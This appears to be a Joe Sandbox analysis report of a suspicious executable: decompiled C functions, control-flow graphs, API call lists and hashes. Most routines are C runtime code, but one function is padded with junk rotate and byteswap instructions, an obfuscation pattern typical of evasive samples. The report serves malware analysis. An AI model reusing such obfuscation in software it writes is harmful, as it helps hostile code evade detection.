                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2427264223-0
                                                                                                                                                                                                        • Opcode ID: 24d4ed759d2685e80b25e6e6d628a1a91acc0d1db33d70efe3c10bff94b60432
                                                                                                                                                                                                        • Instruction ID: 9fe053e8174d457a90ec2405e1741ee39fb6a4e09af935964ea4377df9f5121e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24d4ed759d2685e80b25e6e6d628a1a91acc0d1db33d70efe3c10bff94b60432
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81B09231000148BFCB112F12EC0A8493F6AEB803A1B944036F90809071DF72AED2DAC8
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 207 41dd00-41dd4a call 4011a0 call 41df60 212 41dd7d 207->212 213 41dd4c-41dd61 call 41df60 207->213 215 41dd84-41dda3 call 41d9d0 call 41daa0 212->215 213->212 218 41dd63-41dd7b call 41df60 213->218 224 41ddb3-41ddd2 call 41d420 215->224 225 41dda5-41ddae 215->225 218->215 231 41ddd4 224->231 232 41de3f-41de43 224->232 226 41df21-41df58 call 41d690 call 41da70 225->226 234 41dddf-41dde3 231->234 235 41de45-41de61 call 41d6c0 call 41e170 232->235 236 41de74-41de78 232->236 234->232 239 41dde5-41de30 call 41d900 call 41d6c0 call 41d940 call 4010b0 call 401090 234->239 251 41de66-41de69 235->251 240 41dee5-41df1a call 41df80 236->240 241 41de7a 236->241 269 41de32-41de3b 239->269 270 41de3d 239->270 240->226 245 41de85-41de89 241->245 245->240 249 41de8b-41ded6 call 41d900 call 41d6c0 call 41d940 call 4010b0 call 401090 245->249 274 41dee3 249->274 275 41ded8-41dee1 249->275 251->236 255 41de6b-41de71 251->255 255->236 269->232 270->234 274->245 275->240
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E0041DD00(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				char _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				signed int _v64;
                                                                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				signed char _t104;
                                                                                                                                                                                                        				void* _t108;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        				signed char _t111;
                                                                                                                                                                                                        				signed char _t117;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                                        				signed int _t156;
                                                                                                                                                                                                        				intOrPtr _t197;
                                                                                                                                                                                                        				intOrPtr _t198;
                                                                                                                                                                                                        				void* _t199;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(0xffffffff);
                                                                                                                                                                                                        				_push(E00420170);
                                                                                                                                                                                                        				_push( *[fs:0x0]);
                                                                                                                                                                                                        				 *[fs:0x0] = _t197;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t198 = _t197 - 0x2c;
                                                                                                                                                                                                        				_v20 = _t198;
                                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                                        				_t84 = E004011A0(_a8);
                                                                                                                                                                                                        				_t199 = _t198 + 4;
                                                                                                                                                                                                        				_v28 = _t84;
                                                                                                                                                                                                        				if(E0041DF60(_a4 +  *((intOrPtr*)( *_a4 + 4))) <= 0) {
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_v64 = 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t125 = E0041DF60(_a4 +  *((intOrPtr*)( *_a4 + 4)));
                                                                                                                                                                                                        					_t201 = _t125 - _v28;
                                                                                                                                                                                                        					if(_t125 <= _v28) {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_v64 = E0041DF60(_a4 +  *((intOrPtr*)( *_a4 + 4))) - _v28;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_v32 = _v64;
                                                                                                                                                                                                        				E0041D9D0( &_v40, _t201, _a4);
                                                                                                                                                                                                        				if((E0041DAA0( &_v40) & 0x000000ff) != 0) {
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					_t89 = E0041D420(_a4 +  *((intOrPtr*)( *_a4 + 4)));
                                                                                                                                                                                                        					__eflags = (_t89 & 0x000001c0) - 0x40;
                                                                                                                                                                                                        					if((_t89 & 0x000001c0) != 0x40) {
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _v32;
                                                                                                                                                                                                        							if(_v32 <= 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t111 = E0041D900(_a4 +  *((intOrPtr*)( *_a4 + 4)));
                                                                                                                                                                                                        							_v44 = E0041D940(E0041D6C0(_a4 +  *((intOrPtr*)( *_a4 + 4))), _t111 & 0x000000ff);
                                                                                                                                                                                                        							_v48 = E004010B0(_t114);
                                                                                                                                                                                                        							_t117 = E00401090( &_v48,  &_v44);
                                                                                                                                                                                                        							_t199 = _t199 + 8;
                                                                                                                                                                                                        							__eflags = _t117 & 0x000000ff;
                                                                                                                                                                                                        							if((_t117 & 0x000000ff) == 0) {
                                                                                                                                                                                                        								_t119 = _v32 - 1;
                                                                                                                                                                                                        								__eflags = _t119;
                                                                                                                                                                                                        								_v32 = _t119;
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_v24 = _v24 | 0x00000004;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					__eflags = _v24;
                                                                                                                                                                                                        					if(_v24 == 0) {
                                                                                                                                                                                                        						_t108 = E0041E170(E0041D6C0(_a4 +  *((intOrPtr*)( *_a4 + 4))), _a8, _v28); // executed
                                                                                                                                                                                                        						__eflags = _t108 - _v28;
                                                                                                                                                                                                        						if(_t108 != _v28) {
                                                                                                                                                                                                        							_t110 = _v24 | 0x00000004;
                                                                                                                                                                                                        							__eflags = _t110;
                                                                                                                                                                                                        							_v24 = _t110;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _v24;
                                                                                                                                                                                                        					if(_v24 == 0) {
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _v32;
                                                                                                                                                                                                        							if(_v32 <= 0) {
                                                                                                                                                                                                        								goto L23;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t99 = E0041D900(_a4 +  *((intOrPtr*)( *_a4 + 4)));
                                                                                                                                                                                                        							_v52 = E0041D940(E0041D6C0(_a4 +  *((intOrPtr*)( *_a4 + 4))), _t99 & 0x000000ff);
                                                                                                                                                                                                        							_v56 = E004010B0(_t102);
                                                                                                                                                                                                        							_t104 = E00401090( &_v56,  &_v52);
                                                                                                                                                                                                        							_t199 = _t199 + 8;
                                                                                                                                                                                                        							__eflags = _t104 & 0x000000ff;
                                                                                                                                                                                                        							if((_t104 & 0x000000ff) == 0) {
                                                                                                                                                                                                        								_t156 = _v32 - 1;
                                                                                                                                                                                                        								__eflags = _t156;
                                                                                                                                                                                                        								_v32 = _t156;
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_v24 = _v24 | 0x00000004;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L23:
                                                                                                                                                                                                        					E0041DF80(_a4 +  *((intOrPtr*)( *_a4 + 4)), 0);
                                                                                                                                                                                                        					_v8 = 0xffffffff;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v24 = _v24 | 0x00000004;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E0041D690(_a4 +  *((intOrPtr*)( *_a4 + 4)), _v24, 0);
                                                                                                                                                                                                        				_v60 = _a4;
                                                                                                                                                                                                        				E0041DA70( &_v40, _a4 +  *((intOrPtr*)( *_a4 + 4)));
                                                                                                                                                                                                        				 *[fs:0x0] = _v16;
                                                                                                                                                                                                        				return _v60;
                                                                                                                                                                                                        			}






























                                                                                                                                                                                                        0x0041de96
                                                                                                                                                                                                        0x0041deb6
                                                                                                                                                                                                        0x0041debe
                                                                                                                                                                                                        0x0041dec9
                                                                                                                                                                                                        0x0041dece
                                                                                                                                                                                                        0x0041ded4
                                                                                                                                                                                                        0x0041ded6
                                                                                                                                                                                                        0x0041de7f
                                                                                                                                                                                                        0x0041de7f
                                                                                                                                                                                                        0x0041de82
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041ded8
                                                                                                                                                                                                        0x0041dede
                                                                                                                                                                                                        0x0041dede
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041ded6
                                                                                                                                                                                                        0x0041de85
                                                                                                                                                                                                        0x0041dee5
                                                                                                                                                                                                        0x0041def2
                                                                                                                                                                                                        0x0041df1a
                                                                                                                                                                                                        0x0041dda5
                                                                                                                                                                                                        0x0041ddab
                                                                                                                                                                                                        0x0041ddab
                                                                                                                                                                                                        0x0041df32
                                                                                                                                                                                                        0x0041df3a
                                                                                                                                                                                                        0x0041df40
                                                                                                                                                                                                        0x0041df4b
                                                                                                                                                                                                        0x0041df58

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 004011A0: _strlen.LIBCMT ref: 004011A7
                                                                                                                                                                                                        • std::ios_base::width.LIBCPMTD ref: 0041DEF2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _strlenstd::ios_base::width
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3171587704-0
                                                                                                                                                                                                        • Opcode ID: e9ebce2433b65021befaeed00c6cc1b85f70666fc95637b79b99a9baf7bc3b05
                                                                                                                                                                                                        • Instruction ID: 546b61e034ceb762cadfded71d656263c09a8c1fcaf6c9b7d8edd0f84c95d12f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9ebce2433b65021befaeed00c6cc1b85f70666fc95637b79b99a9baf7bc3b05
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E8120B5E00209EFCB04DF65C591AEEBBB1FF44358F14811AE506AB351DB38EA81CB95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 277 40d262-40d284 HeapCreate 278 40d286-40d287 277->278 279 40d288-40d291 277->279
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040D262(intOrPtr _a4) {
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                                                        				 *0x42ac1c = _t6;
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					 *0x42b21c = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D277
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                                                        • Opcode ID: 32eedacb91c0ca5d00e12516b8c9a05d987cda7cdd2c733f03c73cb4dae580b6
                                                                                                                                                                                                        • Instruction ID: 31ed7505522818ce638a14f1cd9faab8278572d7838acb46b0b07490664e8efb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32eedacb91c0ca5d00e12516b8c9a05d987cda7cdd2c733f03c73cb4dae580b6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8D05E36B943489BDB205FB2BC087663BDCD384395F808476B90CC6690E674C6929B88
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 280 40c77b-40c787 call 40c64f 282 40c78c-40c790 280->282
                                                                                                                                                                                                        C-Code - Quality: 25%
                                                                                                                                                                                                        			E0040C77B(intOrPtr _a4) {
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                                        				_t2 = E0040C64F(_t3, _t4, _t5, _t8); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _doexit.LIBCMT ref: 0040C787
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __lock.LIBCMT ref: 0040C65D
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __decode_pointer.LIBCMT ref: 0040C694
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __decode_pointer.LIBCMT ref: 0040C6A9
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __decode_pointer.LIBCMT ref: 0040C6D3
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __decode_pointer.LIBCMT ref: 0040C6E9
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __decode_pointer.LIBCMT ref: 0040C6F6
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __initterm.LIBCMT ref: 0040C725
                                                                                                                                                                                                          • Part of subcall function 0040C64F: __initterm.LIBCMT ref: 0040C735
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1597249276-0
                                                                                                                                                                                                        • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                        • Instruction ID: 7a47cbf55db6954b496256cd15d597979179f47a8b068da45af427d848545b3c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DB0923258020C77DA202686AC07F063A0987C0B64E240021BA0C2D1E1A9A3A961808A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 283 40b4a1-40b4a3 call 40b42f 285 40b4a8-40b4a9 283->285
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040B4A1() {
                                                                                                                                                                                                        				void* _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E0040B42F(0); // executed
                                                                                                                                                                                                        				return _t1;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x0040b4a3
                                                                                                                                                                                                        0x0040b4a9

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __encode_pointer.LIBCMT ref: 0040B4A3
                                                                                                                                                                                                          • Part of subcall function 0040B42F: TlsGetValue.KERNEL32(00000000,?,0040B4A8,00000000,00413B3B,0042A7F8,00000000,00000314,?,0040C982,0042A7F8,Microsoft Visual C++ Runtime Library,00012010), ref: 0040B441
                                                                                                                                                                                                          • Part of subcall function 0040B42F: TlsGetValue.KERNEL32(00000005,?,0040B4A8,00000000,00413B3B,0042A7F8,00000000,00000314,?,0040C982,0042A7F8,Microsoft Visual C++ Runtime Library,00012010), ref: 0040B458
                                                                                                                                                                                                          • Part of subcall function 0040B42F: RtlEncodePointer.NTDLL(00000000,?,0040B4A8,00000000,00413B3B,0042A7F8,00000000,00000314,?,0040C982,0042A7F8,Microsoft Visual C++ Runtime Library,00012010), ref: 0040B496
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2585649348-0
                                                                                                                                                                                                        • Opcode ID: 0f107dd4288dc00ff80855e8c9a1847734dacdce0a6d54d170ca7f962bdcb6ea
                                                                                                                                                                                                        • Instruction ID: 50f6daa7a78768cd96c63fd1e65e43298281fa0e5c7346b119cefa6b879db6cf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f107dd4288dc00ff80855e8c9a1847734dacdce0a6d54d170ca7f962bdcb6ea
                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 19%
                                                                                                                                                                                                        			E00419050(void* __eax, char* _a4, intOrPtr _a8) {
                                                                                                                                                                                                        				short* _v8;
                                                                                                                                                                                                        				short* _v12;
                                                                                                                                                                                                        				short* _v16;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				short* _t45;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				asm("rcr edi, 0x5f");
                                                                                                                                                                                                        				asm("ror eax, 0xc8");
                                                                                                                                                                                                        				asm("bswap esi");
                                                                                                                                                                                                        				_t72 = _t68 + 1 - 1 + 0x37;
                                                                                                                                                                                                        				asm("ror esi, 0x6f");
                                                                                                                                                                                                        				asm("rcl edx, 0xc0");
                                                                                                                                                                                                        				asm("rol ebx, 0x9f");
                                                                                                                                                                                                        				_t39 = (0x0000002b * (_t79 + 2) & 0x00000011) * (_t68 + 1 - 1 + 0x37) + 0x3d;
                                                                                                                                                                                                        				asm("ror edi, 0xbe");
                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                        				asm("rol ebx, 0x4b");
                                                                                                                                                                                                        				asm("ror edx, 0xd0");
                                                                                                                                                                                                        				asm("rol edx, 0x6e");
                                                                                                                                                                                                        				asm("rol edx, 0x80");
                                                                                                                                                                                                        				asm("rcr edx, 0xdf");
                                                                                                                                                                                                        				asm("bswap edi");
                                                                                                                                                                                                        				asm("rcl edi, 0x6f");
                                                                                                                                                                                                        				asm("rcr edi, 0xf3");
                                                                                                                                                                                                        				_push(0x2000); // executed
                                                                                                                                                                                                        				_t45 = L0040278A(0xfffffffffffffff9,  !(((0x0000002b * (_t79 + 2) & 0x00000011) * (_t68 + 1 - 1 + 0x37) + 0x3d) * _t39) * ((_t39 * _t39 >> 0x20) - 1) >> 0x20,  !( ~( !( !_t72 - 0x59) & 0x000000ce)), ( !(((0x0000002b * (_t79 + 2) & 0x00000011) * (_t68 + 1 - 1 + 0x37) + 0x3d) * _t39) * ((_t39 * _t39 >> 0x00000020) - 0x00000001) & 0x000000db) - 0xfc); // executed
                                                                                                                                                                                                        				_v12 = _t45;
                                                                                                                                                                                                        				_v8 = _v12;
                                                                                                                                                                                                        				MultiByteToWideChar(0, 0, _a4, 0xffffffff, _v8, 0x1000);
                                                                                                                                                                                                        				E004045A0(0xfffffffffffffff9,  !( ~( !( !_t72 - 0x59) & 0x000000ce)), 0xe4, _a8, _v8, 0x1000);
                                                                                                                                                                                                        				_v16 = _v8;
                                                                                                                                                                                                        				_push(_v16);
                                                                                                                                                                                                        				E00404905(0xfffffffffffffff9,  !( ~( !( !_t72 - 0x59) & 0x000000ce)), 0xe4, ( !(((0x0000002b * (_t79 + 2) & 0x00000011) * (_t68 + 1 - 1 + 0x37) + 0x3d) * _t39) * ((_t39 * _t39 >> 0x00000020) - 0x00000001) & 0x000000db) - 0xfc);
                                                                                                                                                                                                        				return _a8;
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001000), ref: 00419105
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                                                                        • Opcode ID: 142393879d2a7b66c00bb39d92a0daf38e18b4e27b4d19f928142b433daea49a
                                                                                                                                                                                                        • Instruction ID: b5efc798a334217b311e5b23e25a7c5da2a586d6c86a5d752dc7cbb393c2376b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 142393879d2a7b66c00bb39d92a0daf38e18b4e27b4d19f928142b433daea49a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31214CB7A006086BE704C67DDC46BADBB55D7C9330F109721FA28DB3D4D6388E414781
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040F990(signed int __eax, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				signed int _t142;
                                                                                                                                                                                                        				signed int _t145;
                                                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                                                        				signed int _t151;
                                                                                                                                                                                                        				signed int _t154;
                                                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                                                        				signed int _t159;
                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                        				signed int _t165;
                                                                                                                                                                                                        				signed int _t168;
                                                                                                                                                                                                        				signed int _t171;
                                                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                                                        				signed int _t177;
                                                                                                                                                                                                        				signed int _t180;
                                                                                                                                                                                                        				signed int _t183;
                                                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                                                        				signed int _t192;
                                                                                                                                                                                                        				signed int _t195;
                                                                                                                                                                                                        				signed int _t198;
                                                                                                                                                                                                        				signed int _t201;
                                                                                                                                                                                                        				signed int _t204;
                                                                                                                                                                                                        				signed int _t207;
                                                                                                                                                                                                        				signed int _t210;
                                                                                                                                                                                                        				signed int _t213;
                                                                                                                                                                                                        				signed int _t216;
                                                                                                                                                                                                        				signed int _t219;
                                                                                                                                                                                                        				signed int _t222;
                                                                                                                                                                                                        				signed int _t225;
                                                                                                                                                                                                        				signed int _t228;
                                                                                                                                                                                                        				signed int _t231;
                                                                                                                                                                                                        				signed int _t234;
                                                                                                                                                                                                        				signed int _t237;
                                                                                                                                                                                                        				signed int _t240;
                                                                                                                                                                                                        				signed int _t243;
                                                                                                                                                                                                        				signed int _t246;
                                                                                                                                                                                                        				signed int _t249;
                                                                                                                                                                                                        				signed int _t252;
                                                                                                                                                                                                        				signed int _t255;
                                                                                                                                                                                                        				signed int _t258;
                                                                                                                                                                                                        				signed int _t261;
                                                                                                                                                                                                        				signed int _t264;
                                                                                                                                                                                                        				signed int _t267;
                                                                                                                                                                                                        				signed int _t270;
                                                                                                                                                                                                        				signed int _t276;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t278 =  *(__eax + 0x42) & 0x0000ffff;
                                                                                                                                                                                                        				_t279 =  *(__eax + 0x44) & 0x0000ffff;
                                                                                                                                                                                                        				_v8 =  *(__eax + 0x42) & 0x0000ffff;
                                                                                                                                                                                                        				_v12 =  *(__eax + 0x44) & 0x0000ffff;
                                                                                                                                                                                                        				if(__esi != 0) {
                                                                                                                                                                                                        					_v16 = _v16 & 0x00000000;
